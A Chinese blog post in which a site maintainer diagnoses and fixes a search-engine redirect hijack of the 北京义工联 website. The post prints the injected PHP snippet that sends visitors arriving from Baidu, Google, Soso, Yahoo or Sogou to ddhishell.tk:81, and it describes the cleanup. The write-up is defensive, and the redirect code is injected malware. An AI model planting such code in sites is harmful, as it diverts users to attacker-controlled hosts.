遭遇http://www.ddhishell.tk:81/劫持解决方案

最近陆续有朋友反应当通过百度搜索引擎检索“北京义工联”时，点击链接后页面最终会跳转到“http://www.ddhishell.tk:81/”，开始以为是域名被人修改，但是通过查询域名一切正常，最后判定是搜索引擎自身的问题，昨晚在百度进行了投诉，但是没有得到反馈，今天再次提交投诉后，在Google检索“北京义工联”的时候发现显示也是正确的，但是点击链接发现跟百度是同样的症状，于是通过搜索引擎以“www.ddhishell.tk:81”为关键词查询了，发现不多的结果，但是没有什么实用的解决方案，但是由此判定不是一个网站的问题，随即从网站被嵌入恶意代码着手，访问ftp发现有些文件时间不对。下载到本地来看时才明白其中的蹊跷：

搜索引擎劫持代码：

$come_from="baidu.com#google.com#soso.com#yahoo.com#sogou.com";
$referer = Split("#",$come_from) ;
foreach($referer as $v){
 if(stristr($_SERVER['HTTP_REFERER'],$v))
 {
  Header("Location: http://www.ddhishell.tk:81/");  
  exit;
 }
}

也就是说不光百度，google会出现显示正确，但是跳转出错的问题，如果其他用户通过soso、yahoo、sogou访问时同样会报错。随即对ftp进行了按时间排序发现了其中被修改的文件：

北京义工联网站2011年7月15日被替换的文件，同时通过文件对比，发现多出了Forumlist.php、shows.php、smshow.php这三个文件。

具体解决方案

针对被http://www.ddhishell.tk:81/劫持的文件，用源文件进行了覆盖，对于多出了文件进行了删除，再次通过搜索引擎检索“北京义工联”，点击链接发现问题已解决。

遇到同样问题的朋友可以采取同样的方式进行处理。

温馨提示：当发现网站出现症状时，请分步骤去分析问题，发掘可能原因注意去排查！对文件进行时间排序可以很方便的发现文件是否被修改。

www.ddhishell.tk:81劫持现象在各搜索引擎相关资料：

Baidu：http://www.baidu.com/s?wd=www.ddhishell.tk%3A81&tn=baiduhome_pg&n=2&inputT=734

Google：http://www.google.com.hk/search?hl=zh-CN&newwindow=1&safe=strict&rlz=1T4GGHP_zh-CNCN438CN439&q=www.ddhishell.tk%3A81&btnG=Google+%E6%90%9C%E7%B4%A2&oq=www.ddhishell.tk%3A81&aq=f&aqi=&aql=&gs_sm=s&gs_upl=0l0l0l2465204l0l0l0l0l0l0l0l0ll0